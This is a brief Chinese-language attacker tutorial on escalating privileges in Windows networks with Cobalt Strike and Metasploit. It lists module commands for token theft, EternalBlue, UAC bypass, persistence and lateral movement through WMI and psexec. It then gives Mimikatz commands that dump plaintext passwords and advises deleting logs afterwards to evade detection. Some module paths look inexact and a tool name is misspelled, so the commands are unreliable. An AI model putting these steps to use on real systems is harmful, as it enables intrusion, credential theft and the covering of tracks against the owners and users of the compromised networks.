Cobalt Strike的权限提升
在进行权限提升之前,攻击者需要首先获得目标系统的初始访问权限。这通常通过以下几种方式实现:网络钓鱼,漏洞利用,社会工程学。
成功获取初始访问权限后,攻击者会在目标系统上植入一个Cobalt Strike Beacon,这是一种后门工具,用于与Cobalt Strike服务器通信。
提升权限
在拥有初始访问权限后,下一步是提升权限。Cobalt Strike提供了多种提升权限的方法,包括:漏洞利用:利用操作系统或应用程序中的已知漏洞进行权限提升。
run post/windows/manage/steal_token
run post/windows/manage/inject_into_process
建立持久性
为了确保持续访问目标系统,攻击者会建立持久性。Cobalt Strike提供了多种方法。
run post/windows/manage/persistence_exe
run post/windows/manage/install_service
横向移动
权限提升和持久性建立后,攻击者通常会在网络中横向移动,以获取更多系统的访问权限。常用的方法包括:凭证盗窃(MinmiKatz工具)可以从当前系统中提取其他系统的凭证,远程命令执行(通过WMI工具)在其他系统上远程执行命令。
run post/windows/manage/wmi_exec
MSF的权限提升
获取初试访问权限
与Cobalt Strike类似,MSF同样需要首先获取目标系统的初始访问权限。常见的方法包括网络钓鱼,漏洞利用,社会工程学。
提升权限
在拥有初始访问权限后,MSF提供了多种提升权限的方法。
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/local/bypassuac
post/windows/manage/steal_token
建立持久性
run persistence
run post/windows/manage/persistence
横向移动
MSF的横向移动与CS类似
post/windows/gather/credentials/mimikatz
exploit/windows/smb/psexec
在win2012上使用Mimikatz
获取系统访问权限
首先,攻击者需要获取目标系统的访问权限。这通常通过CS或MSF等工具实现。成功获取访问权限后,攻击者可以将Mimikatz上传到目标系统。
加载Mimikatz
将Mimikatz上传到目标系统后,可以通过命令行加载并执行Mimikatz
提取明文密码
在Mimikatz中执行以下命令以提取明文密码
privilege::debug
sekurlsa::logonpasswords
清理痕迹
执行完成后,及时清理Mimikatz及相关痕迹,以避免被检测。例如,可以删除上传的Mimikatz文件,并清理系统日志